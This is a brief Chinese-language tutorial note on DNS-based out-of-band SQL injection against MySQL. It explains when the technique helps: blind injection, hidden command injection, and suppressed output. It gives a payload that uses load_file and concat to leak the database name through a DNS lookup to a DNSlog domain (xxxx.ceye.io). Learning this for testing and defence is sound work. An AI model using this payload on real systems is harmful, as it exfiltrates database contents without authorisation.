mysql--DNS注入
利用DNS在解析时会留下有用的日志
使用条件
1.有sql盲注(或时间)注入的站点,可以用sqlmap或手工注入需要频繁请求,最后导致被ban ip时
2.发现疑似命令注入的洞,但是目标站点不显示,无法确定是否真的有洞
3.目标不让信息回显,但是如果能发送请求,那么就可以尝试DNS--用DNSlog来获取回显(一般为root权限)
原理:
把域名dns指向我们服务器域名,这样的话解析域名的时候就会向我们的dns服务器上面进行查询,从而可以获取数据库上信息等.
在mysql中payload常为:
load_file(concat('\\\\',(select database()),'.xxxx.ceye.io'))
其中load_file()函数
load_file是用来读取文件的,返回文件内容为字符串(需要root权限)
但也可用于发送dns请求
concat()为字符串连接函数
(select database())-->为注入查询的位置
'.xxxx.ceye.io'为平台域名